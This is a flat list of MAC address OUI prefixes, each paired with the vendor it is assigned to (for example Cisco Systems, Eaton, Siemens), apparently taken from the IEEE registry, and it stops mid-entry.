001A0C Swe-Dish Satellite Systems AB 001A07 Arecont Vision 0019AC GSP SYSTEMS Inc. 0019B0 HanYang System 001995 Jurong Hi-Tech (Suzhou)Co.ltd 00199A EDO-EVI 001A08 Simoco Ltd. 001A04 Interay Solutions BV 001A02 SECURE CARE PRODUCTS, INC 001A1A Gentex Corporation/Electro-Acoustic Products 001953 Chainleader Communications Corp. 001955 Cisco Systems, Inc 001959 Staccato Communications Inc. 00194D Avago Technologies Sdn Bhd 00194E Ultra Electronics - TCS (Tactical Communication Systems) 001962 Commerciant, LP 00195D ShenZhen XinHuaTong Opto Electronics Co.,Ltd 001923 Phonex Korea Co., LTD. 00191C Sensicast Systems 001928 Siemens AG, Transportation Systems 00190D IEEE 1394c 00197C Riedel Communications GmbH 00196F SensoPart GmbH 0019A0 NIHON DATA SYSTENS, INC. 001991 avinfo 00198C iXSea 001933 Strix Systems, Inc. 001934 TRENDON TOUCH TECHNOLOGY CORP. 001994 Jorjin Technologies Inc. 0018DA Würth Elektronik eiSos GmbH & Co. KG 0018D5 REIGNCOM 0018D4 Unified Display Interface SIG 0018E4 YIGUANG 0018E5 Adhoco AG 0018DD Silicondust Engineering Ltd 0018DF The Morey Corporation 0018E1 Verkerk Service Systemen 0018A8 AnNeal Technology Inc. 0018A2 XIP Technology AB 00189C Weldex Corporation 00189A HANA Micron Inc. 001897 JESS-LINK PRODUCTS Co., LTD 00190A HASWARE INC. 001904 WB Electronics Sp. z o.o. 001915 TECOM Co., Ltd. 00191B Sputnik Engineering AG 001909 DEVI - Danfoss A/S 00189E OMNIKEY GmbH. 001881 Buyang Electronics Industrial Co., Ltd 0018A9 Ethernet Direct Corporation 0018A7 Yoggie Security Systems LTD. 0018C2 Firetide, Inc 0018E7 Cameo Communications, INC. 001821 SINDORICOH 001823 Delta Electronics, Inc. 001815 GZ Technologies, Inc. 001818 Cisco Systems, Inc 00181A AVerMedia Information Inc. 001816 Ubixon Co., Ltd. 00183E Digilent, Inc 001842 Nokia Danmark A/S 001840 3 Phoenix, Inc. 001844 Heads Up Technologies, Inc. 00187A Wiremold 00186C Neonode AB 00185F TAC Inc. 001864 Eaton Corporation 001866 Leutron Vision 001860 SIM Technology Group Shanghai Simcom Ltd., 001806 Hokkei Industries Co., Ltd. 00182B Softier 001829 Gatsometer 001838 PanAccess Communications,Inc. 001857 Unilever R&D 001853 Atera Networks LTD. 001859 Strawberry Linux Co.,Ltd. 00184F 8 Ways Technology Corp. 0017D4 Monsoon Multimedia, Inc 0017DF Cisco Systems, Inc 0017F0 SZCOM Broadband Network Technology Co.,Ltd 0017F1 Renu Electronics Pvt Ltd 0017FF PLAYLINE Co.,Ltd. 0017F6 Pyramid Meriden Inc. 001873 Cisco Systems, Inc 001746 Freedom9 Inc. 00174D DYNAMIC NETWORK FACTORY, INC. 001744 Araneo Ltd. 001749 HYUNDAE YONG-O-SA CO.,LTD 001743 Deck Srl 00173D Neology 0017AF Enermet 0017AA elab-experience inc. 0017AE GAI-Tronics 0017A5 Ralink Technology Corp 00176C Pivot3, Inc. 001770 Arti Industrial Electronics Ltd. 00176D CORE CORPORATION 001773 Laketune Technologies Co. Ltd 00178B Teledyne Technologies Incorporated 001780 Applied Biosystems B.V. 0017BA SEDO CO., LTD. 0017BE Tratec Telecom B.V. 0017C0 PureTech Systems, Inc. 0017B5 Peerless Systems Corporation 0017A8 EDM Corporation 0017A9 Sentivision 001757 RIX TECHNOLOGY LIMITED 0017C5 SonicWALL 0016BF PaloDEx Group Oy 0016B7 Seoul Commtech 0016BB Law-Chain Computer Technology Co Ltd 0016B4 Private 0016A7 AWETA G&P 001740 Bluberi Gaming Technologies Inc 001732 Science-Technical Center "RISSA" 00173A Cloudastructure Inc 00172F NeuLion Incorporated 001728 Selex Communications 001722 Hanazeder Electronic GmbH 001723 Summit Data Communications 0016E1 SiliconStor, Inc. 0016E2 American Fibertek, Inc. 00171F IMV Corporation 001710 Casa Systems Inc. 0016A0 Auto-Maskin 001713 Tiger NetCom 0016FD Jaty Electronics 0016EF Koko Fitness, Inc. 0016CD HIJI HIGH-TECH CO., LTD. 00162D STNet Co., Ltd. 001627 embedded-logic DESIGN AND MORE GmbH 001622 BBH SYSTEMS GMBH 001613 LibreStream Technologies Inc. 00168D KORWIN CO., Ltd. 00168E Vimicro corporation 001689 Pilkor Electronics Co., Ltd 00168A id-Confirm Inc 001679 eOn Communications 001678 SHENZHEN BAOAN GAOKE ELECTRONICS CO., LTD 001674 EuroCB (Phils.), Inc. 001670 SKNET Corporation 00163F CReTE SYSTEMS Inc. 00163D Tsinghua Tongfang Legend Silicon Tech. Co., Ltd. 00163A YVES TECHNOLOGY CO., LTD. 001638 TECOM Co., Ltd. 001633 Oxford Diagnostics Ltd. 00164F World Ethnic Broadcastin Inc. 00164A Vibration Technology Limited 001645 Power Distribution, Inc. 001604 Sigpro 0015FB setex schermuly textile computer gmbh 0015FE SCHILLING ROBOTICS LLC 001686 Karl Storz Imaging 00167E DIBOSS.CO.,LTD 00167B Haver&Boecker 00160D Be Here Corporation 00160F BADGER METER INC 001667 A-TEC Subsystem INC. 00165D AirDefense, Inc. 00165B Grip Audio 0015C9 Gumstix, Inc 0015BA iba AG 0015BB SMA Solar Technology AG 0015BF technicob 0015BC Develco 0015BD Group 4 Technology Ltd 0015B5 CI Network Corp. 001563 Cisco Systems, Inc 001564 BEHRINGER Spezielle Studiotechnik GmbH 001561 JJPlus Corporation 001558 FOXCONN 001571 Nolan Systems 001565 XIAMEN YEALINK NETWORK TECHNOLOGY CO.,LTD 001569 PECO II, Inc. 0015EC Boca Devices LLC 0015EF NEC TOKIN Corporation 0015E4 Zimmer Elektromedizin 001587 Takenaka Seisakusho Co.,Ltd 001582 Pulse Eight Limited 00157B Leuze electronic GmbH + Co. KG 001578 Audio / Video Innovations 0015AE kyung il 0015CD Exartech International Corp. 00159C B-KYUNG SYSTEM Co.,Ltd. 001595 Quester Tangent Corporation 0015D9 PKC Electronics Oy 0015DD IP Control Systems Ltd. 0014EF TZero Technologies, Inc. 00151F Multivision Intelligent Surveillance (Hong Kong) Ltd 001522 Dea Security 00151A Hunter Engineering Company 001514 Hu Zhou NAVA Networks&Electronics Ltd. 0014D3 SEPSA 0014D8 bio-logic SA 0014DA Huntleigh Healthcare 0014D5 Datang Telecom Technology CO. , LCD,Optical Communication Br 0014CA Key Radio Systems Limited 001543 Aberdeen Test Center 001541 StrataLight Communications, Inc. 001538 RFID, Inc. 00152E PacketHop, Inc. 001516 URIEL SYSTEMS INC. 00154F one RF Technology 001545 SEECODE Co., Ltd. 0014EE Western Digital Technologies, Inc. 001501 LexBox 0014C8 Contemporary Research Corp 0014C5 Alive Technologies Pty Ltd 0014BC SYNECTIC TELECOM EXPORTS PVT. LTD. 0014B9 MSTAR SEMICONDUCTOR 0014BD incNETWORKS, Inc 0014B7 AR Infotek Inc. 0014B5 PHYSIOMETRIX,INC 0014A3 Vitelec BV 001497 ZHIYUAN Eletronics co.,ltd. 001499 Helicomm Inc 001492 Liteon, Mobile Media Solution SBU 001494 ESU AG 001460 Kyocera Wireless Corp. 00145C Intronics B.V. 00145A Westermo Neratec AG 00145B SeekerNet Inc. 00141F SunKwang Electronics Co., Ltd 00141D KEBA Industrial Automation Germany GmbH 00144C General Meters Corp. 001443 Consultronics Europe Ltd 001449 Sichuan Changhong Electric Ltd. 001446 SuperVision Solutions LLC 001440 ATOMIC Corporation 00142E 77 Elektronika Kft. 001430 ViPowER, Inc 001432 Tarallax Wireless, Inc. 001485 Giga-Byte 001483 eXS Inc. 001471 Eastern Asia Technology Limited 00149C HF Company 001389 Redes de Telefonía Móvil S.A. 00138C Kumyoung.Co.Ltd 00138E FOAB Elektronik AB 001376 Tabor Electronics Ltd. 001380 Cisco Systems, Inc 001385 Add-On Technology Co., LTD. 001412 S-TEC electronics AG 001411 Deutschmann Automation GmbH & Co. KG 001405 OpenIB, Inc. 004501 Midmark RTLS 0013E7 Halcro 0013EA Kamstrup A/S 0013E1 Iprobe AB 0013E3 CoVi Technologies, Inc. 0013E4 YANGJAE SYSTEMS CORP. 0013B7 Scantech ID 0013B3 Ecom Communications Technology Co., Ltd. 001403 Renasis, LLC 0013F5 Akimbi Systems 0013F1 AMOD Technology Co., Ltd. 0013A1 Crow Electronic Engeneering 00139C Exavera Technologies, Inc. 001394 Infohand Co.,Ltd 0013C1 Asoka USA Corporation 0013C0 Trix Tecnologia Ltda. 00136C TomTom 001364 Paradigm Technology Inc.. 00136B E-TEC 0013D9 Matrix Product Development, Inc. 0013CC Tall Maple Systems 00130D GALILEO AVIONICA 001308 Nuvera Fuel Cells 001307 Paravirtual Corporation 0012FC PLANET System Co.,LTD 0012FE Lenovo Mobile Communication Technology Ltd. 0012F7 Xiamen Xinglian Electronics Co., Ltd. 0012E1 Alliant Networks, Inc 0012DF Novomatic AG 0012E2 ALAXALA Networks Corporation 0012D4 Princeton Technology, Ltd 001355 TOMEN Cyber-business Solutions, Inc. 001357 Soyal Technology Co., Ltd. 001360 Cisco Systems, Inc 00135D NTTPC Communications, Inc. 001352 Naztec, Inc. 0012C5 V-Show Technology (China) Co.,Ltd 0012C2 Apex Electronics Factory 0012BE Astek Corporation 001345 Eaton Corporation 001347 Red Lion Controls, LP 001343 Matsushita Electronic Components (Europe) GmbH 00133E MetaSwitch 00132E ITian Coporation 001339 CCV Deutschland GmbH 00132B Phoenix Digital 0012EC Movacolor b.v. 0012EB PDH Solutions, LLC 00131B BeCell Innovations Corp. 00130B Mextal B.V. 0012D9 Cisco Systems, Inc 001286 ENDEVCO CORP 001274 NIT lab 00122C Soenen Controls N.V. 00122B Virbiage Pty Ltd 001232 LeWiz Communications Inc. 00121A Techno Soft Systemnics Inc. 001270 NGES Denro Systems 00126E Seidel Elektronik GmbH Nfg.KG 00126F Rayson Technology Co., Ltd. 001263 Data Voice Technologies GmbH 00125C Green Hills Software, Inc. 00125F AWIND Inc. 001255 NetEffect Incorporated 0012AD VIVAVIS AG 001253 AudioDev AB 00124C BBWM Corporation 001244 Cisco Systems, Inc 00122D SiNett Corporation 0012A0 NeoMeridian Sdn Bhd 00119D Diginfo Technology Corporation 00119A Alkeria srl 00119C EP&T Energy 00118C Missouri Department of Transportation 001193 Cisco Systems, Inc 0011B4 Westermo Network Technologies AB 0011B8 Liebherr - Elektronik GmbH 0011E5 KCodes Corporation 0011DE EURILOGIC 0011DF Current Energy 001201 Cisco Systems, Inc 001200 Cisco Systems, Inc 0011EE Estari, Inc. 0011C1 4P MOBILE DATA PROCESSING 0011B2 2001 Technology Inc. 0011AF Medialink-i,Inc 00121B Sound Devices, LLC 001204 u10 Networks, Inc. 00120A Emerson Climate Technologies GmbH 001208 Gantner Instruments GmbH 0011D7 eWerks Inc 0011C8 Powercom Co., Ltd. 001138 TAISHIN CO., LTD. 001136 Goodrich Sensor Systems 001132 Synology Incorporated 001129 Paradise Datacom Ltd. 001130 Allied Telesis (Hong Kong) Ltd. 001147 Secom-Industry co.LTD. 00114A KAYABA INDUSTRY Co,.Ltd. 001142 e-SMARTCOM INC. 001139 STOEBER ANTRIEBSTECHNIK GmbH + Co. KG. 00113E JL Corporation 00118E Halytech Mace 001186 Prime Systems, Inc. 001183 Datalogic ADC, Inc. 00117D ZMD America, Inc. 00117F Neotune Information Technology Corporation,.LTD 001107 RGB Networks Inc. 001108 Orbital Data Corporation 00110C Atmark Techno, Inc. 001103 kawamura electric inc. 001120 Cisco Systems, Inc 001118 BLX IC Design Corp., Ltd. 00117C e-zy.net 001178 Chiron Technology Ltd 00114D Atsumi Electric Co.,LTD. 00114B Francotyp-Postalia GmbH 00116A Domo Ltd 00115E ProMinent Dosiertechnik GmbH 001157 Oki Electric Industry Co., Ltd. 000FF0 Sunray Co. Ltd. 000FAE E2O Communications 000FB1 Cognio Inc. 000FA7 Raptor Networks Technology 000F9E Murrelektronik GmbH 000F88 AMETEK, Inc. 000F7E Ablerex Electronics Co., LTD 000F83 Brainium Technologies Inc. 000FD9 FlexDSL Telecommunications AG 000FD0 ASTRI 000FCA A-JIN TECHLINE CO, LTD 000F6C ADDI-DATA GmbH 000F5C Day One Digital Media Limited 000F52 YORK Refrigeration, Marine & Controls 000F4C Elextech INC 000FEC ARKUS Inc. 000FED Anam Electronics Co., Ltd 000FDD SORDIN AB 000F84 Astute Networks, Inc. 000F7D Xirrus 000F76 Digital Keystone, Inc. 000F79 Bluetooth Interest Group Inc. 000F93 Landis+Gyr Ltd. 000F94 Genexis BV 000F8F Cisco Systems, Inc 000FC3 PalmPalm Technology, Inc. 000F2C Uplogix, Inc. 000F2B GREENBELL SYSTEMS 000F28 Itronix Corporation 000F23 Cisco Systems, Inc 000F24 Cisco Systems, Inc 000F22 Helius, Inc. 000F17 Insta Elektro GmbH 000EA5 BLIP Systems 000EA0 NetKlass Technology Inc. 000ED6 Cisco Systems, Inc 000ED8 Positron Access Solutions Corp 000ED1 Osaka Micro Computer. 000EB8 Iiga co.,Ltd 000EBB Everbee Networks 000EBE B&B Electronics Manufacturing Co. 000EE4 BOE TECHNOLOGY GROUP CO.,LTD 000EDE REMEC, Inc. 000ECE S.I.T.T.I. S.p.A. 000ED4 CRESITT INDUSTRIE 000F42 Xalyo Systems 000F39 IRIS SENSORS 000F3E CardioNet, Inc 000F3F Big Bear Networks 000F35 Cisco Systems, Inc 000F36 Accurate Techhnologies, Inc. 000F1E Chengdu KT Electric Co.of High & New Technology 000F15 Icotera A/S 000F0D Hunt Electronic Co., Ltd. 000EFE EndRun Technologies LLC 000EF3 Smartlabs, Inc. 000EF2 Infinico Corporation 000F08 Indagon Oy 000F04 cim-usa inc 000EFC JTAG Technologies B.V. 000EB0 Solutions Radio BV 000E8A Avara Technologies Pty. Ltd. 000E83 Cisco Systems, Inc 000E88 VIDEOTRON CORP. 000E81 Devicescape Software, Inc. 000E86 Alcatel North America 000E69 China Electric Power Research Institute 000E61 MICROTROL LIMITED 000E64 Elphel, Inc 000E5A TELEFIELD inc. 000E5D Triple Play Technologies A/S 000E52 Optium Corporation 000E3D Televic N.V. 000E39 Cisco Systems, Inc 000E34 NexGen City, LP 000E2D Hyundai Digital Technology Co.,Ltd. 000E30 AERAS Networks, Inc. 000E29 Shester Communications Inc 000E7E ionSign Oy 000E77 Decru, Inc. 000E6A 3Com Ltd 000E9C Benchmark Electronics 000E9A BOE TECHNOLOGY GROUP CO.,LTD 000E90 PONICO CORP. 000E4D Numesa Inc. 000E4C Bermai Inc. 000E49 Forsway Scandinavia AB 000E42 Motic Incoporation Ltd. 000E06 Team Simoco Ltd 000E0D Hesch Schröder GmbH 000DFF CHENMING MOLD INDUSTRY CORP. 000DF6 Technology Thesaurus Corp. 000E19 LogicaCMG Pty Ltd 000E1A JPS Communications 000D60 IBM Corp 000D5F Minds Inc 000D54 3Com Ltd 000D4C Outline Electronics Ltd. 000D9C K.A. Schmersal GmbH & Co. KG 000D98 S.W.A.C. Schmitt-Walter Automation Consult GmbH 000D8C Shanghai Wedone Digital Ltd. CO. 000D94 AFAR Communications,Inc 000D8D Prosoft Technology, Inc 000DA6 Universal Switching Corporation 000DA2 Infrant Technologies, Inc. 000D69 TMT&D Corporation 000D68 Vinci Systems, Inc. 000D64 COMAG Handels AG 000D5C Robert Bosch GmbH, VT-ATMO 000D84 Makus Inc. 000D74 Sand Network Systems, Inc. 000D7D Afco Systems 000D73 Technical Support, Inc. 000DB3 SDO Communication Corperation 000DAE SAMSUNG HEAVY INDUSTRIES CO., LTD. 000DB2 Ammasso, Inc. 000DAA S.A.Tehnology co.,Ltd. 000DE1 Control Products, Inc. 000DD0 TetraTec Instruments GmbH 000DD3 SAMWOO Telecommunication Co.,Ltd. 000DC7 COSMIC ENGINEERING INC. 000DC2 Private 000DBF TekTone Sound & Signal Mfg., Inc. 000DD8 BBN 000D38 NISSIN INC. 000D34 Shell International Exploration and Production, Inc. 000D32 DispenseSource, Inc. 000D2E Matsushita Avionics Systems Corporation 000D28 Cisco Systems, Inc 000D0F Finlux Ltd 000D12 AXELL Corporation 000D0A Barco Projection Systems NV 000CFC S2io Technologies Corp 000CF6 Sitecom Europe BV 000CF2 GAMESA Eólica 000CC2 ControlNet (India) Private Limited 000CC1 Eaton Corporation 000CE1 The Open Group 000CDC BECS Technology, Inc 000D4D Ninelanes 000D53 Beijing 5w Communication Corp. 000D15 Voipac s.r.o. 000CC5 Nextlink Co., Ltd. 000CDE ABB STOTZ-KONTAKT GmbH 000C53 Private 000C48 QoStek Corporation 000C4D Curtiss-Wright Controls Avionics & Electronics 000C44 Automated Interfaces, Inc. 000C3B Orion Electric Co., Ltd. 000C71 Wybron, Inc 000C72 Tempearl Industrial Co., Ltd. 000C78 In-Tech Electronics Limited 000C74 RIVERTEC CORPORATION 000C3D Glsystech Co., Ltd. 000C2F SeorimTechnology Co.,Ltd. 000C31 Cisco Systems, Inc 000C2E Openet information technology(shenzhen) Co., Ltd. 000C2C Enwiser Inc. 000C8B Connect Tech Inc 000C90 Octasic Inc. 000C8C KODICOM CO.,LTD. 000C55 Microlink Communications Inc. 000C59 Indyme Electronics, Inc. 000C5C GTN Systems B.V. 000C52 Roll Systems Inc. 000CBF Holy Stone Ent. Co., Ltd. 000CA1 SIGMACOM Co., LTD. 000CA6 Mintera Corporation 000C94 United Electronic Industries, Inc. (EUI) 000C9B EE Solutions, Inc 000C67 OYO ELECTRIC CO.,LTD 000C63 Zenith Electronics Corporation 000B91 Aglaia Gesellschaft für Bildverarbeitung und Kommunikation mbH 000B97 Matsushita Electric Industrial Co.,Ltd. 000B92 Ascom Danmark A/S 000B9A Shanghai Ulink Telecom Equipment Co. Ltd. 000B96 Innotrac Diagnostics Oy 000B9D TwinMOS Technologies Inc. 000BB5 nStor Technologies, Inc. 000BB9 Imsys AB 000BBB Etin Systems Co., Ltd 000BBC En Garde Systems, Inc. 000BB1 Super Star Technology Co., Ltd. 000BBF Cisco Systems, Inc 000BAD PC-PoS Inc. 000BA0 T&L Information Inc. 000C17 AJA Video Systems Inc 000C11 NIPPON DEMPA CO.,LTD. 000C14 Diagnostic Instruments, Inc. 000C28 RIFATRON 000C21 Faculty of Science and Technology, Keio University 000C1B ORACOM Co, Ltd. 000BC9 Electroline Equipment 000BC2 Corinex Communication Corp. 000BF7 NIDEK CO.,LTD 000C00 BEB Industrie-Elektronik AG 000BF3 BAE SYSTEMS 000BED ELM Inc. 000B38 Knürr GmbH 000B32 VORMETRIC, INC. 000B2C Eiki Industrial Co. Ltd. 000B26 Wetek Corporation 000B28 Quatech Inc. 000AF2 NeoAxiom Corp. 000AF5 Airgo Networks, Inc. 000AF4 Cisco Systems, Inc 000AF0 SHIN-OH ELECTRONICS CO., LTD. R&D 000AEE GCD Hard- & Software GmbH 000B56 Cybernetics 000B50 Oxygnet 000B1F I CON Computer Co. 000B13 ZETRON INC 000B10 11wave Technonlogy Co.,Ltd 000B07 Voxpath Networks 000B2A HOWTEL Co., Ltd. 000B30 Beijing Gongye Science & Technology Co.,Ltd 000B2B HOSTNET CORPORATION 000B52 JOYMAX ELECTRONICS CO. LTD. 000B49 RF-Link System Inc. 000B46 Cisco Systems, Inc 000B04 Volktek Corporation 000AF9 HiConnect, Inc. 000B02 Dallmeier electronic 000B69 Franke Finland Oy 000B66 Teralink Communications 000B7A L-3 Linkabit 000B84 BODET 000B77 Cogent Systems, Inc. 000AD8 IPCserv Technology Corp. 000AD7 Origin ELECTRIC CO.,LTD. 000ACD Sunrich Technology Limited 000ACC Winnow Networks, Inc. 000ACF PROVIDEO Multimedia Co. Ltd. 000AD1 MWS 000AD3 INITECH Co., Ltd 000AC8 ZPSYS CO.,LTD. (Planning&Management) 000A96 MEWTEL TECHNOLOGY INC. 000A82 TATSUTA SYSTEM ELECTRONICS CO.,LTD. 000A7D Valo, Inc. 000A7F Teradon Industries, Inc 000A81 TEIMA Audiotex S.L. 000A87 Integrated Micromachines Inc. 000A77 Bluewire Technologies LLC 000A59 HW server 000A54 Laguna Hills, Inc. 000A52 AsiaRF Ltd. 000A4F Brain Boxes Limited 000A42 Cisco Systems, Inc 000AC6 Overture Networks. 000AAB Toyota Technical Development Corporation 000AE9 AirVast Technology Inc. 000A7A Kyoritsu Electric Co., Ltd. 000A75 Caterpillar, Inc 000A9C Server Technology, Inc. 000A8C Guardware Systems Ltd. 000A65 GentechMedia.co.,ltd. 000AB4 ETIC Telecommunications 0009CC Moog GmbH 0009C8 SINAGAWA TSUSHIN KEISOU SERVICE 0009C4 Medicore Co., Ltd 000A38 Apani Networks 000A41 Cisco Systems, Inc 000A3E EADS Telecom 000A48 Albatron Technology 000A36 Synelec Telecom Multimedia 000A32 Xsido Corporation 0009B7 Cisco Systems, Inc 0009B2 L&F Inc. 0009A8 Eastmode Pte Ltd 0009AA Data Comm for Business, Inc. 0009A4 HARTEC Corporation 0009A6 Ignis Optics, Inc. 000A22 Amperion Inc 000A1C Bridge Information Co., Ltd. 000A12 Azylex Technology, Inc 000A13 Honeywell Video Systems 000A09 TaraCom Integrated Products, Inc. 0009F0 Shimizu Technology Inc. 0009EF Vocera Communications 0009E4 K Tech Infosystem Inc. 000A2B Etherstuff 000A00 Mediatek Corp. 0009D9 Neoscale Systems, Inc 0009D0 Solacom Technologies Inc. 000972 Securebase,Inc 000978 AIJI System Co., Ltd. 000973 Lenten Technology Co., Ltd. 000975 fSONA Communications Corporation 000977 Brunner Elektronik AG 000969 Meret Optical Communications 00096E GIANT ELECTRONICS LTD. 0009A7 Bang & Olufsen A/S 0009A0 Microtechno Corporation 00099B Western Telematic Inc. 000990 ACKSYS Communications & systems 000940 AGFEO GmbH & Co. KG 00093B HYUNDAI NETWORKS INC. 000934 Dream-Multimedia-Tv GmbH 000953 Linkage System Integration Co.Ltd. 00094C Communication Weaver Co.,Ltd. 000942 Wireless Technologies, Inc 000945 Palmmicro Communications Inc 00093E C&I Technologies 000930 AeroConcierge Inc. 00091E Firstech Technology Corp. 000920 EpoX COMPUTER CO.,LTD. 000922 TST Biometrics GmbH 000916 Listman Home Technologies, Inc. 000911 Cisco Systems, Inc 000912 Cisco Systems, Inc 000908 VTech Technology Corp. 00090B MTL Instruments PLC 000905 iTEC Technologies Ltd. 0008F9 Artesyn Embedded Technologies 00096C Imedia Semiconductor Corp. 00095F Telebyte, Inc. 00098A EqualLogic Inc 00097F Vsecure 2000 LTD. 000980 Power Zenith Inc. 000855 NASA-Goddard Space Flight Center 00085A IntiGate Inc. 000858 Novatechnology Inc. 000850 Arizona Instrument Corp. 00085B Hanbit Electronics Co., Ltd. 00082B Wooksung Electronics, Inc. 0008C8 Soneticom, Inc. 0008C4 Hikari Co.,Ltd. 0008BA Erskine Systems Ltd 0008B5 TAI GUEN ENTERPRISE CO., LTD 0008B7 HIT Incorporated 0008A9 SangSang Technology, Inc. 0008A5 Peninsula Systems Inc. 0008A2 ADI Engineering, Inc. 000898 Gigabit Optics Corporation 00089B ICP Electronics Inc. 0008F4 Bluetake Technology Co., Ltd. 0008F7 Hitachi Ltd, Semiconductor & Integrated Circuits Gr 0008F5 YESTECHNOLOGY Co.,Ltd. 0008EC Optical Zonu Corporation 0008CF Nippon Koei Power Systems Co., Ltd. 0008CB Zeta Broadband Inc. 0008D3 Hercules Technologies S.A.S. 0008D0 Musashi Engineering Co., LTD. 00089C Elecs Industry Co., Ltd. 00089D UHD-Elektronik 00088F ADVANCED DIGITAL TECHNOLOGY 00088B Tropic Networks Inc. 0008E6 Littlefeet 0008E2 Cisco Systems, Inc 00086B MIPSYS 00085D Mitel Corporation 000886 Hansung Teliann, Inc. 00087F SPAUN electronic GmbH & Co. KG 0007AF Red Lion Controls, LP 0007B2 Transaccess S.A. 0007AD Pentacon GmbH Foto-und Feinwerktechnik 0007AC Eolring 0007AA Quantum Data Inc. 0007F6 Qqest Software Systems 0007FB Giga Stream UMTS Technologies GmbH 0007ED Altera Corporation 0007EA Massana, Inc. 0007F1 TeraBurst Networks Inc. 0007F2 IOA Corporation 0007F0 LogiSync LLC 0007E7 FreeWave Technologies 0007E3 Navcom Technology, Inc. 0007E1 WIS Communications Co. Ltd. 0007E0 Palm Inc. 0007D6 Commil Ltd. 0007D7 Caporis Networks AG 0007D4 Zhejiang Yutong Network Communication Co Ltd. 000818 Pixelworks, Inc. 00080F Proximion Fiber Optics AB 000812 GM-2 Corporation 00080B Birka BPA Informationssystem AB 00080A Espera-Werke GmbH 0007FA ITT Co., Ltd. 0007A4 GN Netcom Ltd. 00079D Musashi Co., Ltd. 00079F Action Digital Inc. 000792 Sütron Electronic GmbH 000790 Tri-M Technologies (s) Limited 00078D NetEngines Ltd. 00078A Mentor Data System Inc. 000784 Cisco Systems, Inc 00082E Multitone Electronics PLC 00082A Powerwallz Network Security 000817 EmergeCore Networks LLC 000815 CATS Co., Ltd. 0007CE Cabletime Limited 0007D3 SPGPrints B.V. 0007D0 Automat Engenharia de Automação Ltda. 00047C Skidata AG 0007BE DataLogic SpA 0006DC Syabas Technology (Amquest) 0006E6 DongYang Telecom Co., Ltd. 0006D2 Tundra Semiconductor Corp. 0006FE Ambrado, Inc 0006E7 Bit Blitz Communications Inc. 0006ED Inara Networks 0006B8 Bandspeed Pty Ltd 0006BB ATI Technologies Inc. 0006BD BNTECHNOLOGY Co., Ltd. 0006C3 Schindler Elevator Ltd. 0006B2 Linxtek Co. 00070C SVA-Intrusion.com Co. Ltd. 00070F Fujant, Inc. 000714 Brightcom 0006F3 AcceLight Networks 000776 Federal APD 00077A Infoware System Co., Ltd. 00076A NEXTEYE Co., Ltd. 000762 Group Sense Limited 0006D8 Maple Optical Systems 0006CF Thales Avionics In-Flight Systems, LLC 0006DB ICHIPS Co., Ltd. 000767 Yuxing Electronics Company Limited 00075B Gibson Guitars 00072E North Node AB 000727 Zi Corporation (HK) Ltd. 00066A InfiniCon Systems, Inc. 000661 NIA Home Technologies Corp. 00066B Sysmex Corporation 00055A Power Dsine Ltd. 000653 Cisco Systems, Inc 00064F PRO-NETS Technology Corporation 000651 Aspen Networks Inc. 00065C Malachite Technologies, Inc. 0006AA VT Miltope 000657 Market Central, Inc. 000697 R & D Center 00069A e & Tel 000699 Vida Design Co. 000622 Chung Fu Chen Yeh Enterprise Corp. 000612 Accusys, Inc. 000609 Crossport Systems 000616 Tel Net Co., Ltd. 00060D Wave7 Optics 00CBBD Cambridge Broadband Networks Group 00063D Microwave Data Systems Inc. 000639 Newtec 00062F Pivotech Systems Inc. 000636 Jedai Broadband Networks 0006B6 Nir-Or Israel Ltd. 0006A3 Bitran Corporation 00069F Kuokoa Networks 0006A2 Microtune, Inc. 0006A6 Artistic Licence Engineering Ltd 00068D SEPATON, Inc. 000684 Biacore AB 000682 Convedia 00067D Takasago Ltd. 000671 Softing AG 000672 Netezza 000642 Genetel Systems Inc. 00064A Honeywell Co., Ltd. (KOREA) 00063F Everex Communications Inc. 00061E Maxan Systems 0005D6 L-3 Linkabit 0005DA Apex Automationstechnik 0005C7 I/F-COM A/S 0005C6 Triz Communications 0005CC Sumtel Communications, Inc. 0005CF Thunder River Technologies, Inc. 0005A6 Extron Electronics 000588 Sensoria Corp. 00058D Lynx Photonic Networks, Inc. 00058A Netcom Co., Ltd. 000591 Active Silicon Ltd 000593 Grammar Engine Inc. 00058F CLCsoft co. 0005E3 LightSand Communications, Inc. 0005ED Technikum Joanneum GmbH 0005EF ADOIR Digital Technology 0005E9 Unicess Network, Inc. 0005A9 Princeton Networks, Inc. 0005AF InnoScan Computing A/S 0005A1 Zenocom 0005A0 MOBILINE Kft. 000558 Synchronous, Inc. 000550 Vcomms Connect Limited 000600 Toshiba Teli Corporation 0005E6 Egenera, Inc. 000584 AbsoluteValue Systems, Inc. 00057A Overture Networks 0005BB Myspace AB 000564 Tsinghua Bitway Co., Ltd. 0004F9 Xtera Communications, Inc. 0004FA NBS Technologies Inc. 0004F8 QUALICABLE TV Industria E Com., Ltda 0004F5 SnowShore Networks, Inc. 0004F2 Polycom 0004F3 FS FORTH-SYSTEME GmbH 0004A6 SAF Tehnika Ltd. 0004A8 Broadmax Technologies, Inc. 0004A1 Pathway Connectivity 0004A2 L.S.I. Japan Co., Ltd. 00049B Cisco Systems, Inc 000499 Chino Corporation 000541 Advanced Systems Co., Ltd. 000545 Internet Photonics 00053A Willowglen Services Pte Ltd 000531 Cisco Systems, Inc 000539 A Brand New World in Sweden AB 0004ED Billion Electric Co., Ltd. 0004E7 Lightpointe Communications, Inc 0004E6 Banyan Network Private Limited 0004DE Cisco Systems, Inc 0004E1 Infinior Microsystems 00048E Ohm Tech Labs, Inc. 00048D Teo Technologies, Inc 000490 Optical Access 000486 ITTC, University of Kansas 00048B Poscon Corporation 000484 Amann GmbH 00052A Ikegami Tsushinki Co., Ltd. 00052D Zoltrix International Limited 000525 Puretek Industrial Co., Ltd. 000517 Shellcomm, Inc. 00051C Xnet Technology Corp. 000512 Zebra Technologies Inc 000503 ICONAG 0004CE Patria Ailon 0004C7 NetMount 0004C2 Magnipix, Inc. 000478 G. Star Technology Corporation 00047A AXXESSIT ASA 00046A Navini Networks 00046B Palm Wireless, Inc. 000472 Telelynx, Inc. 000464 Pulse-Link Inc 000427 Cisco Systems, Inc 000420 Slim Devices, Inc. 000411 Inkra Networks, Inc. 000410 Spinnaker Networks, Inc. 000412 WaveSmith Networks, Inc. 0003FD Cisco Systems, Inc 0003F9 Pleiades Communications, Inc. 0003FE Cisco Systems, Inc 0003F5 Chip2Chip 000442 NACT 000445 LMS Skalar Instruments GmbH 00043D INDEL AG 00043B Lava Computer Mfg., Inc. 000431 GlobalStreams, Inc. 00044E Cisco Systems, Inc 000452 RocketLogix, Inc. 000465 i.s.t isdn-support technik GmbH 00045E PolyTrax Information Technology AG 0003DE OTC Wireless 000330 